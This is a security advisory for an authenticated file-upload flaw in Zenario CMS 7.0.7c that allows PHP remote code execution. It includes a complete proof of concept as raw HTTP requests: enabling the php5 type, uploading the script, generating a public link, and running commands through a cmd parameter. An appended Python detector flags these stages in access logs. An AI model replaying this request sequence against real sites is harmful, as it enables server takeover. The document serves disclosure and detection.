Zenario CMS 7.0.7c Remote Code Execution Vulnerability

17 Nov 2015, reported by Gjoko Krstic (zeroscience, www.zeroscience.mk)

Zenario CMS 7.0.7c remote code execution vulnerability, allows arbitrary PHP code executio



Vendor: Tribal Ltd.
Product web page: http://www.zenar.io
Affected version: <= 7.0.7c and 7.1.0 (svn)

Summary: Zenario is a web-based content management system for sites
with one or many languages. It's designed to grow with your site,
adding extranet, online database and custom functionality when you
need it.

Desc: The vulnerability is caused by improper verification of files
uploaded through the Document upload script via the 'Filedata' POST
parameter, which allows arbitrary files to be uploaded to '/public/downloads/'
and reached through a publicly generated link, provided the admin first
adds the file extension to the allowed list. This can be exploited
to execute arbitrary PHP code by uploading a malicious PHP script file
and executing system commands.

Tested on: Ubuntu 14.04 LTS
           PHP 5.5.9-1ubuntu4.1
           Zend Engine v2.5.0
           Zend OPcache v7.0.3
           MySQL/5.5.37


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2015-5280
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5280.php

Vendor: http://zenar.io/zenario-707d


27.10.2015

--


----------------------
1. Add php5 file type:

GET http://192.168.0.17/zenario/admin/organizer.php?fromCID=1&fromCType=html#zenario__administration/panels/file_types HTTP/1.1

POST /zenario/admin/ajax.php?_json=1&_ab=1&path=zenario_file_type HTTP/1.1
Host: 192.168.0.17
Connection: keep-alive
Content-Length: 516
Accept: text/plain, */*; q=0.01
Origin: http://192.168.0.17
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.0.17/zenario/admin/organizer.php?fromCID=1&fromCType=html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: __cfduid=dc0db15b5395f7d4726b0bba71b6939621445947596; _ga=GA1.2.1921014116.1445947598; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1; PHPSESSID=sf3mce44rpoet5em7a5o6aln35

_save=true&amp;_confirm=&amp;_box={"key":{"id":""},"tabs":{"details":{"edit_mode":{"on":1},"fields":{"type":{"current_value":"php5"},"mime_type":{"current_value":"application/octet-stream"}}}},"_sync":{"cache_dir":"ab_PBtBxW05_mPQDMgpv","password":"/L9HLsICPXzTD93VPn4Ou2Yw6HW6f4CPMFANLol7rcI=","iv":"7XoL6dLYAaMfqXgy7DfOeQ==","session":false}}


---------------
2. Upload file:

POST /zenario/ajax.php?__pluginClassName__=undefined&__path__=zenario_document_upload&method_call=handleAdminBoxAJAX HTTP/1.1
Host: 192.168.0.17
Content-Length: 458
Origin: http://192.168.0.17
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
X_FILENAME: phpinfo.php5
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUrDf3o8emcPIM8oD
Accept: */*
Referer: http://192.168.0.17/zenario/admin/organizer.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: __cfduid=dc0db15b5395f7d4726b0bba71b6939621445947596; _ga=GA1.2.1921014116.1445947598; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1; PHPSESSID=sf3mce44rpoet5em7a5o6aln35

------WebKitFormBoundaryUrDf3o8emcPIM8oD
Content-Disposition: form-data; name="id"

12
------WebKitFormBoundaryUrDf3o8emcPIM8oD
Content-Disposition: form-data; name="fileUpload"

1
------WebKitFormBoundaryUrDf3o8emcPIM8oD
Content-Disposition: form-data; name="Filedata"; filename="phpinfo.php5"
Content-Type: application/octet-stream


------WebKitFormBoundaryUrDf3o8emcPIM8oD--



------------------------
3. Save and verify file:

POST /zenario/admin/ajax.php?_json=1&_ab=1&path=zenario_document_upload&id=12 HTTP/1.1
Host: 192.168.0.17
Content-Length: 530
Accept: text/plain, */*; q=0.01
Origin: http://192.168.0.17
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.0.17/zenario/admin/organizer.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: __cfduid=dc0db15b5395f7d4726b0bba71b6939621445947596; _ga=GA1.2.1921014116.1445947598; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1; PHPSESSID=sf3mce44rpoet5em7a5o6aln35

_save=true&amp;_confirm=&amp;_box={"key":{"id":"12","fileUpload":1},"tabs":{"upload_document":{"edit_mode":{"on":1},"fields":{"document__upload":{"_display_value":"phpinfo.php5","current_value":"~79fa169880192652f933c1834aae09f40c4fc39c~2Fphpinfo.php5"}}}},"_sync":{"cache_dir":"ab_uMwuijj5_YP_0GAuZ","password":"/NUErtsIJtkXJXJqRr0pbt8oqAIUqz0GVdjJung5J/4=","session":false}}


------------------------
4. Generate public link:

POST /zenario/ajax.php?__pluginClassName__=zenario_common_features&__path__=zenario__content/panels/documents&method_call=handleOrganizerPanelAJAX HTTP/1.1
Host: 192.168.0.17
Content-Length: 28
Accept: text/plain, */*; q=0.01
Origin: http://192.168.0.17
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.0.17/zenario/admin/organizer.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: __cfduid=dc0db15b5395f7d4726b0bba71b6939621445947596; _ga=GA1.2.1921014116.1445947598; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1; PHPSESSID=sf3mce44rpoet5em7a5o6aln35

id=27&generate_public_link=1


----------------
5. Execute code:

GET http://192.168.0.17/zenario/public/downloads/RvoId/phpinfo.php5?cmd=id;pwd HTTP/1.1
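Detection logic for the request sequence above, added here as an example and not part of the Zero Science advisory or of Zenario: it audits an allowed-upload extension list for entries PHP would execute, and labels access-log lines that match the file-type edit (step 1), the Filedata upload handler (step 2) and a script fetched from under /public/downloads/ (step 5). The log lines, client addresses and the EXECUTABLE_EXTENSIONS list are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Extensions PHP would run if served from a web-reachable directory (constructed list;
# 'php5' is the one step 1 adds to the allowed types).
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}

# Request part of a combined-format access log line: method, path, status.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed log lines mirroring steps 1, 2 and 5 of the advisory, plus a benign download.
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Oct/2015:10:00:01 +0100] "POST /zenario/admin/ajax.php?_json=1&_ab=1&path=zenario_file_type HTTP/1.1" 200 512',
    '192.0.2.10 - - [27/Oct/2015:10:00:05 +0100] "POST /zenario/ajax.php?__pluginClassName__=undefined&__path__=zenario_document_upload&method_call=handleAdminBoxAJAX HTTP/1.1" 200 88',
    '192.0.2.10 - - [27/Oct/2015:10:00:09 +0100] "GET /zenario/public/downloads/RvoId/phpinfo.php5?cmd=id;pwd HTTP/1.1" 200 4096',
    '192.0.2.11 - - [27/Oct/2015:10:00:12 +0100] "GET /zenario/public/downloads/Ab12c/report.pdf HTTP/1.1" 200 9000',
]

def audit_allowed_types(allowed):
    """Return the entries of an allowed-upload extension list that PHP would execute."""
    normalised = (ext.lower().lstrip(".") for ext in allowed)
    return sorted(ext for ext in normalised if ext in EXECUTABLE_EXTENSIONS)

def classify(line):
    """Map one access-log line to the advisory stage it matches, or None."""
    match = LOG_RE.search(line)
    if not match:
        return None
    url = urlsplit(match.group("path"))
    query = parse_qs(url.query)
    if url.path.endswith("/admin/ajax.php") and query.get("path") == ["zenario_file_type"]:
        return "file_type_edit"  # step 1: allowed-extension list changed via admin AJAX
    if url.path.endswith("/ajax.php") and query.get("__path__") == ["zenario_document_upload"]:
        return "document_upload"  # step 2: Filedata upload handler called
    if "/public/downloads/" in url.path:
        name = url.path.rsplit("/", 1)[-1]
        ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
        if ext in EXECUTABLE_EXTENSIONS:
            return "script_under_downloads"  # step 5: script requested from downloads
    return None

def scan(lines):
    """Return (stage, path-without-query) for every line that matches a stage."""
    hits = []
    for line in lines:
        stage = classify(line)
        if stage:
            path = LOG_RE.search(line).group("path").split("?", 1)[0]
            hits.append((stage, path))
    return hits
```

A non-empty result from audit_allowed_types, or a script_under_downloads hit, is the condition to alert on; the fix side is to keep executable extensions out of the allowed list and to deny script execution under /public/downloads/ at the web server.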
